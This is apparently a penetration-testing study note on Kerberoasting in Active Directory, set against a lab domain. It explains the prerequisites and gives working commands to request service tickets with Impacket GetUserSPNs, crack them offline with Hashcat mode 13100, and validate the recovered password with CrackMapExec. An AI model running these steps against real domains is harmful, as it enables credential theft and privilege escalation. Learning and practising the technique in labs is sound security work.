| description |
|---|
It's like roasting marshmallows on a fire... except we're using SPN's instead |
Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments.
- It should be highly noted that this attack targets Service Princial Names (SPNs) Accounts
- An account's cleartext password or NTLM hash
- A shell from a domain user
- SYSTEM level access on a domain-joined account
- Domain accounts running services are often local admins
- If not, they are typically highly privileged domain accounts
- Always be sure to identify what privileges are granted across multiple servers and hosts on the domain
- Finding SPNs associated with high privileged accounts in Windows is very common
- Retrieving a Kerberos ticket for an account with a SPN does not by itself allow you to execute commands in the context of that account
- With that said, the TGS-REP or ticket, is encrypted with the NTLM hash
- This means that it can possibly be taken offline and cracked with Hashcat
-----------------------------------------------------------------------------------------------------
This attack can be performed with the following tools:
- Impacket's GetUserSPNs from a non-domain joined Linux host
- A combination of setspn.exe, powershell, and Mimikatz
- From Windows, we can use PowerView, Rubeus, and other PowerShell scripts
Obtaining a TGS ticket from a Kerberoast attack will NOT guarantee you a set of valid credentials and the ticket must still be taken offline and cracked with Hashcat to obtain the cleartext password. TGS tickets take longer to crack than NTLM hashes!
Also, Kerberoasting can be a great way to move laterally or vertically in a domain but it does not guarantee us any level of access.
- There are times where you can perform the attack, retrieve the TGS keys, crack them offline, and we obtain Domain Admin access or obtain credentials that will aid us in our path there!
-----------------------------------------------------------------------------------------------------
Before we start, we need to make sure that we have the following:
- Valid domain credentials (cleartext or NTLM hash)
- A shell in the context of a domain user, or account such as SYSTEM
- Successfully identify WHICH host is the Domain Controller so we can query it
{% embed url="https://github.com/SecureAuthCorp/impacket" %} GitHub Repository {% endembed %}
The best way to start this process is to start gathering a list of SPNs in the domain. To do this, we need a valid set of Domain credentials and the IP of the Domain Controller
GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
 (2) (3).png)
GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
 (3) (4).png)
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
- In this example, we will write the TGS ticket for the sqldev user in a file named sqldev_tgs
- We can now crack the ticket offline using Hashcat!
- The Hashcat format is 13100
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt
- We get the password of database!
- Upon successful cracking of the TGS ticket, we can use CrackMapExec (CME) to test our new creds and validate our authentication
sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!